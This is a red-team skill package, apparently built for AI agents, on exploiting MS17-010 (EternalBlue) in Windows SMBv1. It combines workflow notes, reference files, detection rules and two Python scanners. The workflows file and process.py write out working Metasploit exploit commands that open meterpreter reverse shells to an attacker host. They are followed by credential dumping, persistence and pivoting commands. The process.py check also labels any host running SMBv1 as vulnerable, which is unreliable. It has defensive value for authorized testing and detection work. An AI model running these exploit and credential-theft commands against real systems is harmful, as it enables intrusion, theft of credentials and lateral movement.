npx skills add mukul975/Anthropic-Cybersecurity-SkillsMITRE ATT&CK
NIST CSF 2.0
MITRE D3FEND
Overview
MS17-010 (EternalBlue) is a critical vulnerability in Microsoft's SMBv1 implementation that allows remote code execution. Originally discovered by the NSA and leaked by the Shadow Brokers in 2017, it was used in the WannaCry and NotPetya ransomware campaigns. Despite patches being available since March 2017, many organizations still have unpatched systems, making it a viable red team exploitation vector especially in legacy environments.
When to Use
- When performing authorized security testing that involves exploiting ms17 010 eternalblue vulnerability
- When analyzing malware samples or attack artifacts in a controlled environment
- When conducting red team exercises or penetration testing engagements
- When building detection capabilities based on offensive technique understanding
Prerequisites
- Familiarity with red teaming concepts and tools
- Access to a test or lab environment for safe execution
- Python 3.8+ with required dependencies installed
- Appropriate authorization for any testing activities
MITRE ATT&CK Mapping
- T1210 - Exploitation of Remote Services
- T1190 - Exploit Public-Facing Application
- T1569.002 - System Services: Service Execution
Workflow
Phase 1: Vulnerability Scanning
- Scan target networks for SMB port 445
- Check for SMBv1 protocol support
- Run MS17-010 vulnerability check (Nmap NSE script or Metasploit auxiliary)
- Document vulnerable systems with OS version and patch level
Phase 2: Exploitation
- Select appropriate exploit variant based on target OS
- Configure exploit payload (Meterpreter, Cobalt Strike beacon, custom shellcode)
- Execute exploit against confirmed vulnerable target
- Verify code execution and establish session
Phase 3: Post-Exploitation
- Establish persistence on compromised system
- Dump credentials from memory
- Use compromised host as pivot point
- Document exploitation evidence
Tools and Resources
| Tool | Purpose |
|---|---|
| Nmap ms-17-010 NSE scripts | Vulnerability detection |
| Metasploit ms17_010_eternalblue | Exploitation module |
| Metasploit ms17_010_psexec | Alternative exploitation |
| AutoBlue-MS17-010 | Standalone Python exploit |
| CrackMapExec | Mass SMB vulnerability scanning |
Detection Indicators
- IDS/IPS signatures for EternalBlue exploit traffic
- SMBv1 negotiation from unusual source hosts
- Event ID 7045: New service installation after exploitation
- Anomalous named pipe activity on SMB
- Large SMB write requests characteristic of buffer overflow
Validation Criteria
- Vulnerable systems identified via scanning
- Exploitation achieved on authorized target
- Code execution confirmed with session established
- Post-exploitation activities documented
- Remediation recommendations provided
References and resources
Everything below is rendered for inspection. Script files are read-only and never run.
References 3
api-reference.md2.0 KB
API Reference: MS17-010 (EternalBlue) Detection
CVE-2017-0144 — EternalBlue
Affected Systems
- Windows XP, Vista, 7, 8, 8.1, 10 (pre-patch)
- Windows Server 2003, 2008, 2008 R2, 2012, 2016 (pre-patch)
Protocol: SMBv1 (Port 445)
Nmap NSE Script
Check for MS17-010
nmap -p 445 --script smb-vuln-ms17-010 <target>Output (Vulnerable)
PORT STATE SERVICE
445/tcp open microsoft-ds
| smb-vuln-ms17-010:
| VULNERABLE:
| Remote Code Execution vulnerability in Microsoft SMBv1 servers
| Risk factor: HIGH CVSSv2: 9.3SMB Protocol Basics
Negotiate Protocol Request
| Offset | Size | Field |
|---|---|---|
| 0 | 4 | NetBIOS Session header |
| 4 | 4 | SMB magic (0xFF534D42) |
| 8 | 1 | Command (0x72 = Negotiate) |
| 9 | 4 | Status |
| 13 | 1 | Flags |
SMB Versions
| Version | Protocol | Notes |
|---|---|---|
| SMBv1 | NT LM 0.12 | Vulnerable to EternalBlue |
| SMBv2 | SMB 2.002 | Not vulnerable |
| SMBv3 | SMB 3.0 | Not vulnerable |
Python Socket Check
SMBv1 Connection Test
import socket
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.settimeout(5)
sock.connect((target, 445))
sock.send(SMB_NEGOTIATE_PACKET)
response = sock.recv(4096)Metasploit Module (Authorized Testing)
Scanner
use auxiliary/scanner/smb/smb_ms17_010
set RHOSTS <target>
runDetection Events
| Source | Indicator |
|---|---|
| Windows Event 7036 | Service state change |
| Sysmon Event 3 | Network connection to 445 |
| IDS | Signature for EternalBlue SMB exploit |
Remediation
- Apply MS17-010 patch (KB4012598 / KB4013389)
- Disable SMBv1:
Set-SmbServerConfiguration -EnableSMB1Protocol $false - Block port 445 at network perimeter
- Enable Windows Firewall rules for SMB
Suricata Detection Rule
alert tcp any any -> $HOME_NET 445 (msg:"ET EXPLOIT EternalBlue Attempt";
flow:established,to_server; content:"|ff|SMB|73|";
content:"|08 00|"; within:2; distance:54; sid:2024217;)standards.md1.2 KB
Standards and Framework References
MITRE ATT&CK
| Technique ID | Name | Tactic |
|---|---|---|
| T1210 | Exploitation of Remote Services | Lateral Movement |
| T1190 | Exploit Public-Facing Application | Initial Access |
| T1569.002 | System Services: Service Execution | Execution |
CVE Details
- CVE-2017-0143 through CVE-2017-0148 - Multiple SMBv1 remote code execution vulnerabilities
- MS17-010 - Microsoft Security Bulletin (March 14, 2017)
- CVSS Score: 9.3 (Critical)
- Affected: Windows XP through Windows Server 2016
Affected Systems
| OS | Version | Vulnerable |
|---|---|---|
| Windows XP | SP3 | Yes (no longer supported) |
| Windows 7 | SP1 | Yes (patched with KB4012212) |
| Windows Server 2008 | R2 SP1 | Yes (patched with KB4012212) |
| Windows Server 2012 | R2 | Yes (patched with KB4012213) |
| Windows 10 | 1607 and earlier | Yes (patched with KB4013198) |
| Windows Server 2016 | RTM | Yes (patched with KB4013429) |
NIST NVD References
- CVE-2017-0144: Buffer overflow in SMBv1 server
- Allows remote attackers to execute arbitrary code via crafted packets
Detection Signatures
- Snort SID 41978: SMB EternalBlue exploit attempt
- Suricata: ET EXPLOIT Possible MS17-010 SMB Request
workflows.md2.1 KB
EternalBlue Exploitation Workflows
Workflow 1: Vulnerability Detection
Nmap NSE Scripts
# Check for MS17-010 vulnerability
nmap -p 445 --script smb-vuln-ms17-010 10.0.0.0/24
# Extended SMB vulnerability scan
nmap -p 445 --script smb-vuln-* 10.0.0.1
# SMB version detection
nmap -p 445 --script smb-protocols 10.0.0.1CrackMapExec
# Mass scan for MS17-010
crackmapexec smb 10.0.0.0/24 -M ms17-010
# Check with authentication
crackmapexec smb 10.0.0.0/24 -u user -p password -M ms17-010Metasploit Auxiliary Scanner
use auxiliary/scanner/smb/smb_ms17_010
set RHOSTS 10.0.0.0/24
set THREADS 10
runWorkflow 2: Exploitation with Metasploit
EternalBlue Module
use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS 10.0.0.1
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST 10.0.0.100
set LPORT 443
exploit
# Post-exploitation
meterpreter > getuid
meterpreter > sysinfo
meterpreter > hashdump
meterpreter > load kiwi
meterpreter > creds_allEternalRomance/Synergy (PsExec variant)
use exploit/windows/smb/ms17_010_psexec
set RHOSTS 10.0.0.1
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 10.0.0.100
set SMBUser ""
set SMBPass ""
exploitWorkflow 3: Post-Exploitation
Credential Dumping
meterpreter > load kiwi
meterpreter > creds_all
meterpreter > kerberos_ticket_list
meterpreter > lsa_dump_secretsPersistence
meterpreter > run persistence -U -i 30 -p 4444 -r 10.0.0.100
meterpreter > run post/windows/manage/enable_rdpPivoting
meterpreter > run post/multi/manage/autoroute
meterpreter > portfwd add -l 445 -p 445 -r 10.0.1.1OPSEC Considerations
- EternalBlue exploitation is noisy and easily detected by IDS/IPS
- Modern EDR solutions detect named pipe and service creation patterns
- Exploitation may crash the target system (especially on 32-bit systems)
- Use only against confirmed vulnerable systems within ROE scope
- Prefer authenticated exploitation variants when credentials are available
- Document any system crashes or instability immediately
Scripts 2
agent.py4.4 KB
#!/usr/bin/env python3
"""Agent for detecting MS17-010 (EternalBlue) vulnerability — authorized testing only."""
import argparse
import json
import socket
import subprocess
from datetime import datetime, timezone
SMB_NEGOTIATE = (
b"\x00\x00\x00\x85" # NetBIOS
b"\xff\x53\x4d\x42" # SMB magic
b"\x72" # Negotiate Protocol
b"\x00\x00\x00\x00" # Status
b"\x18\x53\xc8" # Flags
b"\x00\x00" # Flags2
b"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" # Extra
b"\x00\x00\xff\xfe\x00\x00\x00\x00" # TreeID/PID
b"\x00\x00\x00\x00" # UserID/MuxID
b"\x00" # WordCount
b"\x62\x00" # ByteCount
b"\x02\x50\x43\x20\x4e\x45\x54\x57\x4f\x52\x4b\x20\x50\x52\x4f"
b"\x47\x52\x41\x4d\x20\x31\x2e\x30\x00"
b"\x02\x4c\x41\x4e\x4d\x41\x4e\x31\x2e\x30\x00"
b"\x02\x57\x69\x6e\x64\x6f\x77\x73\x20\x66\x6f\x72\x20\x57\x6f"
b"\x72\x6b\x67\x72\x6f\x75\x70\x73\x20\x33\x2e\x31\x61\x00"
b"\x02\x4c\x4d\x31\x2e\x32\x58\x30\x30\x32\x00"
b"\x02\x4c\x41\x4e\x4d\x41\x4e\x32\x2e\x31\x00"
b"\x02\x4e\x54\x20\x4c\x4d\x20\x30\x2e\x31\x32\x00"
)
def check_ms17_010(target_ip, port=445, timeout=5):
"""Check if target is vulnerable to MS17-010 via SMB negotiation."""
result = {
"target": target_ip,
"port": port,
"smb_open": False,
"vulnerable": False,
"os_info": "",
}
try:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.settimeout(timeout)
sock.connect((target_ip, port))
result["smb_open"] = True
sock.send(SMB_NEGOTIATE)
data = sock.recv(4096)
if len(data) > 36:
result["os_info"] = "SMB service responding"
if data[4:8] == b"\xff\x53\x4d\x42":
result["smb_version"] = "SMBv1"
sock.close()
except (socket.timeout, ConnectionRefusedError, OSError):
pass
return result
def nmap_ms17_010_check(target_ip):
"""Use nmap NSE script to check for MS17-010."""
try:
result = subprocess.check_output(
["nmap", "-p", "445", "--script", "smb-vuln-ms17-010", target_ip],
text=True, errors="replace", timeout=30
)
vulnerable = "VULNERABLE" in result
return {
"target": target_ip,
"method": "nmap",
"vulnerable": vulnerable,
"output": result[:500],
}
except (subprocess.SubprocessError, FileNotFoundError):
return {"target": target_ip, "method": "nmap", "status": "nmap not available"}
def scan_network(cidr, port=445):
"""Scan a network range for SMB port and MS17-010."""
import ipaddress
results = []
try:
network = ipaddress.ip_network(cidr, strict=False)
except ValueError:
return results
for ip in list(network.hosts())[:256]:
ip_str = str(ip)
result = check_ms17_010(ip_str, port, timeout=2)
if result["smb_open"]:
results.append(result)
return results
def main():
parser = argparse.ArgumentParser(
description="Detect MS17-010 EternalBlue vulnerability (authorized testing only)"
)
parser.add_argument("--target", help="Target IP address")
parser.add_argument("--network", help="Network CIDR to scan")
parser.add_argument("--nmap", action="store_true", help="Use nmap NSE script")
parser.add_argument("--output", "-o", help="Output JSON report")
args = parser.parse_args()
print("[*] MS17-010 (EternalBlue) Vulnerability Detection Agent")
print("[!] For authorized security testing only")
report = {"timestamp": datetime.now(timezone.utc).isoformat(), "findings": []}
if args.target:
if args.nmap:
result = nmap_ms17_010_check(args.target)
else:
result = check_ms17_010(args.target)
report["findings"].append(result)
print(f"[*] {args.target}: SMB open={result.get('smb_open')}")
if args.network:
results = scan_network(args.network)
report["findings"].extend(results)
print(f"[*] Network scan: {len(results)} hosts with SMB open")
report["risk_level"] = "CRITICAL" if any(f.get("vulnerable") for f in report["findings"]) else "LOW"
if args.output:
with open(args.output, "w") as f:
json.dump(report, f, indent=2)
print(f"[*] Report saved to {args.output}")
else:
print(json.dumps(report, indent=2))
if __name__ == "__main__":
main()
process.py9.6 KB
#!/usr/bin/env python3
"""
MS17-010 EternalBlue Scanner and Reporter
Scans for MS17-010 vulnerability and generates reports:
- SMB version detection
- MS17-010 vulnerability checking via SMB negotiation
- Exploitation command generation
- Assessment report generation
Usage:
python process.py --scan 10.0.0.0/24 --output scan_results.json
python process.py --check 10.0.0.1 --verbose
python process.py --report scan_results.json --output report.md
Requirements:
pip install impacket rich
"""
import argparse
import ipaddress
import json
import socket
import struct
import sys
from concurrent.futures import ThreadPoolExecutor, as_completed
from datetime import datetime
from pathlib import Path
try:
from rich.console import Console
from rich.table import Table
from rich.panel import Panel
from rich.progress import Progress
except ImportError:
print("[!] Missing dependencies. Install with: pip install rich")
sys.exit(1)
console = Console()
# SMB negotiation packet for MS17-010 detection
SMB_NEGOTIATE = bytes.fromhex(
"00000085ff534d4272000000001853c00000000000000000000000000000fffe00004000"
"006200025043204e4554574f524b2050524f4752414d20312e3000024c414e4d414e312e"
"3000024e54204c414e4d414e20312e30000257696e646f777320666f7220576f726b6772"
"6f75707320332e316100024c4d312e32583030320002"
"4c414e4d414e322e3100024e54204c4d20302e313200"
)
# SMB session setup for MS17-010 tree connect check
SMB_SESSION_SETUP = bytes.fromhex(
"00000088ff534d4273000000001807c00000000000000000000000000000fffe0000"
"4000000dff00000000000000000000000000004a000000000044000200013a0000"
"4e544c4d53535000010000000732000006000600330000000b000b0028000000"
"050093080000000f574f524b53544154494f4e"
)
def check_ms17_010(ip: str, port: int = 445, timeout: int = 5) -> dict:
"""Check if a host is vulnerable to MS17-010."""
result = {
"ip": ip,
"port": port,
"smb_open": False,
"vulnerable": False,
"os_info": "",
"error": None,
}
try:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.settimeout(timeout)
sock.connect((ip, port))
result["smb_open"] = True
# Send SMB negotiate
sock.send(SMB_NEGOTIATE)
response = sock.recv(4096)
if len(response) > 36:
# Check SMB header for response
if response[4:8] == b'\xffSMB':
result["os_info"] = "SMBv1 supported"
# Check dialect index for SMBv1 support
dialect_index = struct.unpack('<H', response[37:39])[0] if len(response) > 39 else 0
# Basic vulnerability check based on SMBv1 support
# A proper check requires tree connect to IPC$ and transaction request
if dialect_index < 0xFFFF:
result["vulnerable"] = True
result["os_info"] = "SMBv1 enabled - potentially vulnerable (confirm with Nmap/Metasploit)"
sock.close()
except socket.timeout:
result["error"] = "Connection timeout"
except ConnectionRefusedError:
result["error"] = "Connection refused"
except OSError as e:
result["error"] = str(e)
return result
def scan_network(network: str, port: int = 445, threads: int = 50, timeout: int = 5) -> list[dict]:
"""Scan network range for MS17-010 vulnerability."""
results = []
try:
targets = list(ipaddress.ip_network(network, strict=False).hosts())
except ValueError as e:
console.print(f"[red][-] Invalid network: {e}[/red]")
return results
console.print(f"[yellow][*] Scanning {len(targets)} hosts on port {port}...[/yellow]")
with Progress() as progress:
task = progress.add_task("[cyan]Scanning...", total=len(targets))
with ThreadPoolExecutor(max_workers=threads) as executor:
futures = {
executor.submit(check_ms17_010, str(ip), port, timeout): str(ip)
for ip in targets
}
for future in as_completed(futures):
result = future.result()
if result["smb_open"]:
results.append(result)
if result["vulnerable"]:
console.print(f"[red][!] VULNERABLE: {result['ip']}[/red]")
else:
console.print(f"[green][+] SMB open: {result['ip']}[/green]")
progress.update(task, advance=1)
return results
def generate_exploit_commands(target_ip: str) -> dict:
"""Generate exploitation commands for a vulnerable host."""
commands = {
"metasploit_eternalblue": [
"msfconsole",
"use exploit/windows/smb/ms17_010_eternalblue",
f"set RHOSTS {target_ip}",
"set PAYLOAD windows/x64/meterpreter/reverse_tcp",
"set LHOST <ATTACKER_IP>",
"set LPORT 443",
"exploit",
],
"metasploit_psexec": [
"use exploit/windows/smb/ms17_010_psexec",
f"set RHOSTS {target_ip}",
"set PAYLOAD windows/meterpreter/reverse_tcp",
"set LHOST <ATTACKER_IP>",
"exploit",
],
"nmap_verification": [
f"nmap -p 445 --script smb-vuln-ms17-010 {target_ip}",
f"nmap -p 445 --script smb-protocols {target_ip}",
],
"crackmapexec": [
f"crackmapexec smb {target_ip} -M ms17-010",
],
}
return commands
def generate_report(scan_results: list[dict], output_path: str):
"""Generate MS17-010 assessment report."""
vulnerable = [r for r in scan_results if r.get("vulnerable")]
smb_open = [r for r in scan_results if r.get("smb_open")]
report = f"""# MS17-010 (EternalBlue) Vulnerability Assessment
## Generated: {datetime.now().strftime('%Y-%m-%d %H:%M:%S')}
---
## 1. Executive Summary
Scanned network for MS17-010 (EternalBlue) vulnerability affecting SMBv1.
**{len(vulnerable)}** potentially vulnerable hosts identified out of
**{len(smb_open)}** hosts with SMB port 445 open.
**Risk Level:** {"CRITICAL" if vulnerable else "LOW"}
## 2. Vulnerability Overview
| Field | Value |
|-------|-------|
| CVE | CVE-2017-0143 through CVE-2017-0148 |
| CVSS | 9.3 (Critical) |
| Bulletin | MS17-010 |
| Protocol | SMBv1 |
| Impact | Remote Code Execution (SYSTEM) |
| Patch Available | Yes (March 2017) |
## 3. Scan Results
### Potentially Vulnerable Hosts
| IP Address | Port | OS Info | Status |
|-----------|------|---------|--------|
"""
for r in vulnerable:
report += f"| {r['ip']} | {r['port']} | {r.get('os_info', 'N/A')} | VULNERABLE |\n"
report += """
### SMB Open (Not Vulnerable or Patched)
| IP Address | Port | Notes |
|-----------|------|-------|
"""
for r in smb_open:
if not r.get("vulnerable"):
report += f"| {r['ip']} | {r['port']} | {r.get('os_info', 'Patched or SMBv1 disabled')} |\n"
report += f"""
## 4. Recommendations
### Immediate Actions
1. Apply MS17-010 patches to all vulnerable systems immediately
2. Disable SMBv1 protocol on all systems where not required
3. Block SMB port 445 at network perimeter
### Commands to Disable SMBv1
```powershell
# Windows Server 2012 R2+
Set-SmbServerConfiguration -EnableSMB1Protocol $false
# Windows 10/Server 2016+
Disable-WindowsOptionalFeature -Online -FeatureName SMB1Protocol
# Group Policy
# Computer Configuration > Admin Templates > Network > Lanman Server
# Set "SMB1" to Disabled
```
## 5. MITRE ATT&CK Mapping
- T1210 - Exploitation of Remote Services
- T1190 - Exploit Public-Facing Application
"""
out = Path(output_path)
out.parent.mkdir(parents=True, exist_ok=True)
with open(out, "w") as f:
f.write(report)
console.print(f"[green][+] Report saved to: {output_path}[/green]")
def main():
parser = argparse.ArgumentParser(description="MS17-010 EternalBlue Scanner")
parser.add_argument("--scan", help="Network range to scan (CIDR notation)")
parser.add_argument("--check", help="Check single host")
parser.add_argument("--threads", type=int, default=50, help="Scan threads")
parser.add_argument("--timeout", type=int, default=5, help="Connection timeout")
parser.add_argument("--exploit-commands", help="Generate exploit commands for IP")
parser.add_argument("--report", help="Generate report from scan results JSON")
parser.add_argument("--output", default="./ms17010_report.md", help="Output path")
args = parser.parse_args()
if args.check:
result = check_ms17_010(args.check, timeout=args.timeout)
table = Table(title=f"MS17-010 Check: {args.check}")
table.add_column("Property", style="cyan")
table.add_column("Value", style="green")
for k, v in result.items():
table.add_row(k, str(v))
console.print(table)
elif args.scan:
results = scan_network(args.scan, threads=args.threads, timeout=args.timeout)
# Save results
json_path = args.output.replace(".md", ".json")
with open(json_path, "w") as f:
json.dump(results, f, indent=2)
console.print(f"[green][+] Scan results saved to: {json_path}[/green]")
generate_report(results, args.output)
elif args.exploit_commands:
commands = generate_exploit_commands(args.exploit_commands)
for method, cmds in commands.items():
console.print(Panel("\n".join(cmds), title=method))
elif args.report:
with open(args.report) as f:
results = json.load(f)
generate_report(results, args.output)
else:
console.print("[yellow]Use --scan <CIDR>, --check <IP>, or --exploit-commands <IP>[/yellow]")
if __name__ == "__main__":
main()